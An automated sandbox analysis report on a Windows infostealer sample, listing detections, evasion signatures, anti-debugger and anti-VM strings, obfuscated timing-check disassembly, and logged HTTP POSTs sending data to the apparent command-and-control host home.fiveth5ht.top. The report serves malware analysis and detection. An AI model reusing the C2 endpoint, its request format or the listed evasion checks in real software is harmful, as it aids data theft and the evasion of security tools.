Windows Analysis Report
qZA8AyGxiA.exe

Overview

General Information

Sample name:qZA8AyGxiA.exe
renamed because original name is a hash value
Original sample name:75f83958dc211ddd4dfed631aed3aafa.exe
Analysis ID:1581233
MD5:75f83958dc211ddd4dfed631aed3aafa
SHA1:b47b4351e5be4bc3830ca73454ee8be8f4f32beb
SHA256:85b5d57cad412bcc5921e20d965120f850769b547fc9e63c2a0f1a18f12f7867
Tags:exe, user-abuse_ch

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • qZA8AyGxiA.exe (PID: 1460 cmdline: "C:\Users\user\Desktop\qZA8AyGxiA.exe" MD5: 75F83958DC211DDD4DFED631AED3AAFA)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: qZA8AyGxiA.exeAvira: detected
Source: qZA8AyGxiA.exeReversingLabs: Detection: 52%
Source: qZA8AyGxiA.exeVirustotal: Detection: 52%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: qZA8AyGxiA.exeJoe Sandbox ML: detected
Source: qZA8AyGxiA.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_0090A5B0
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0090A7F0
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0090A7F0
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0090A7F0
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0090B560
Source: qZA8AyGxiA.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_008A255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_008A255D
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_008A29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_008A29FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 504434
Source: global trafficHTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Ascii: { "id1": "0", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 5.101.3.217 5.101.3.217
Source: Joe Sandbox ViewIP Address: 3.218.7.103 3.218.7.103
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_0096A8C0 recvfrom,0_2_0096A8C0
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknownHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 504434
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 07:55:44 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 07:55:46 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: qZA8AyGxiA.exe, 00000000.00000003.2384933418.00000000019C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: qZA8AyGxiA.exe, 00000000.00000002.2405629426.00000000019CA000.00000004.00000020.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000003.2384933418.00000000019C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868624fd4
Source: qZA8AyGxiA.exe, 00000000.00000002.2405843658.00000000019D5000.00000004.00000020.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000003.2383681749.00000000019D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0
Source: qZA8AyGxiA.exe, 00000000.00000002.2405629426.00000000019CA000.00000004.00000020.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000003.2384933418.00000000019C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862fff::3
Source: qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: qZA8AyGxiA.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: qZA8AyGxiA.exe, qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: qZA8AyGxiA.exe, 00000000.00000003.2275525344.00000000019F5000.00000004.00000020.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724

System Summary

Source: qZA8AyGxiA.exeStatic PE information: section name:
Source: qZA8AyGxiA.exeStatic PE information: section name: .idata
Source: qZA8AyGxiA.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: String function: 008BCD40 appears 58 times
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: String function: 00A57220 appears 83 times
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: String function: 008A75A0 appears 530 times
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: String function: 008BCCD0 appears 50 times
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: String function: 00A7CBC0 appears 82 times
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: String function: 008A73F0 appears 93 times
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: String function: 008E50A0 appears 74 times
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: String function: 008E4F40 appears 278 times
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: String function: 008A71E0 appears 39 times
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: String function: 008ACAA0 appears 60 times
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: String function: 008E4FD0 appears 202 times
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: String function: 009844A0 appears 50 times
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: String function: 008E5340 appears 34 times
Source: qZA8AyGxiA.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: qZA8AyGxiA.exeStatic PE information: Section: lyhwrnys ZLIB complexity 0.9945647912601059
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_008A255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_008A255D
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_2_008A29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_008A29FF
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: qZA8AyGxiA.exeReversingLabs: Detection: 52%
Source: qZA8AyGxiA.exeVirustotal: Detection: 52%
Source: qZA8AyGxiA.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: qZA8AyGxiA.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: apphelp.dll
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: winmm.dll
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: cryptbase.dll
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: cryptsp.dll
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: rsaenh.dll
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: dnsapi.dll
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: napinsp.dll
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: wshbth.dll
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: nlaapi.dll
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: mswsock.dll
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: winrnr.dll
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: uxtheme.dll
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: windows.storage.dll
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: wldp.dll
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeSection loaded: kernel.appcore.dll
Source: qZA8AyGxiA.exeStatic file information: File size 4508672 > 1048576
Source: qZA8AyGxiA.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: qZA8AyGxiA.exeStatic PE information: Raw size of lyhwrnys is bigger than: 0x100000 < 0x1c0600

Data Obfuscation

Source: C:\Users\user\Desktop\qZA8AyGxiA.exeUnpacked PE file: 0.2.qZA8AyGxiA.exe.8a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lyhwrnys:EW;jcgkpoiz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lyhwrnys:EW;jcgkpoiz:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: qZA8AyGxiA.exeStatic PE information: real checksum: 0x45393c should be: 0x44ed84
Source: qZA8AyGxiA.exeStatic PE information: section name:
Source: qZA8AyGxiA.exeStatic PE information: section name: .idata
Source: qZA8AyGxiA.exeStatic PE information: section name:
Source: qZA8AyGxiA.exeStatic PE information: section name: lyhwrnys
Source: qZA8AyGxiA.exeStatic PE information: section name: jcgkpoiz
Source: qZA8AyGxiA.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A60B8C push edx; retn 0000h0_3_01A60B8D
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeCode function: 0_3_01A4DCAC pushad ; ret 0_3_01A4DCAD
Source: qZA8AyGxiA.exeStatic PE information: section name: lyhwrnys entropy: 7.95526963720531

Boot Survival

Source: C:\Users\user\Desktop\qZA8AyGxiA.exeWindow searched: window name: FilemonClass
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeWindow searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeWindow searched: window name: RegmonClass
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeWindow searched: window name: Regmonclass
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeWindow searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\qZA8AyGxiA.exeFile opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: PROCMON.EXE
Source: qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: X64DBG.EXE
Source: qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: WINDBG.EXE
Source: qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: qZA8AyGxiA.exe, 00000000.00000003.2246312242.0000000007520000.00000004.00001000.00020000.00000000.sdmp, qZA8AyGxiA.exe, 00000000.00000002.2402681131.0000000000E11000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 113AA18 second address: 113AA1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 113AA1E second address: 113AA22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 113AA22 second address: 113AA26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 113EF52 second address: 113EF58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 113EF58 second address: 113EF6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11415AA second address: 11415AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 113FE65 second address: 113FEAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7292A9B0Fh 0x00000009 popad 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FC7292A9B0Eh 0x0000001a jmp 00007FC7292A9B18h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10EBABD second address: 10EBAC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10EBAC2 second address: 10EBADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7292A9B17h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1148B2E second address: 1148B3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1145613 second address: 114561D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC7292A9B06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114561D second address: 1145621 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1149BF2 second address: 1149BF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1149BF8 second address: 1149C1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1149C1A second address: 1149C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 ja 00007FC7292A9B06h 0x0000000c pop edx 0x0000000d popad 0x0000000e nop 0x0000000f push edi 0x00000010 mov ebx, dword ptr [ebp+122D2F39h] 0x00000016 pop ebx 0x00000017 push 00000000h 0x00000019 mov ebx, 39094727h 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007FC7292A9B08h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 0000001Bh 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a sub dword ptr [ebp+12469B0Dh], edi 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 ja 00007FC7292A9B06h 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1149C6F second address: 1149C74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1149D62 second address: 1149D6C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC7292A9B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1149D6C second address: 1149D76 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC728ECBE0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1149E52 second address: 1149E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114BA06 second address: 114BA18 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FC728ECBE06h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114BA18 second address: 114BA22 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC7292A9B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114ACF8 second address: 114ACFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114ACFF second address: 114AD09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FC7292A9B06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114BB76 second address: 114BB89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114CBB8 second address: 114CBC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114CBC0 second address: 114CC3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FC728ECBE08h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov ebx, esi 0x00000025 push dword ptr fs:[00000000h] 0x0000002c mov dword ptr [ebp+122D37CAh], eax 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 cld 0x0000003a mov eax, dword ptr [ebp+122D0075h] 0x00000040 mov bh, 93h 0x00000042 push FFFFFFFFh 0x00000044 push 00000000h 0x00000046 push esi 0x00000047 call 00007FC728ECBE08h 0x0000004c pop esi 0x0000004d mov dword ptr [esp+04h], esi 0x00000051 add dword ptr [esp+04h], 0000001Dh 0x00000059 inc esi 0x0000005a push esi 0x0000005b ret 0x0000005c pop esi 0x0000005d ret 0x0000005e mov di, 2DEBh 0x00000062 movzx ebx, ax 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 je 00007FC728ECBE08h 0x0000006e pushad 0x0000006f popad 0x00000070 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114CC3F second address: 114CC4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FC7292A9B06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1153C32 second address: 1153C38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1153C38 second address: 1153C3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1150E89 second address: 1150E8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1150E8D second address: 1150E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1155D1D second address: 1155D22 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
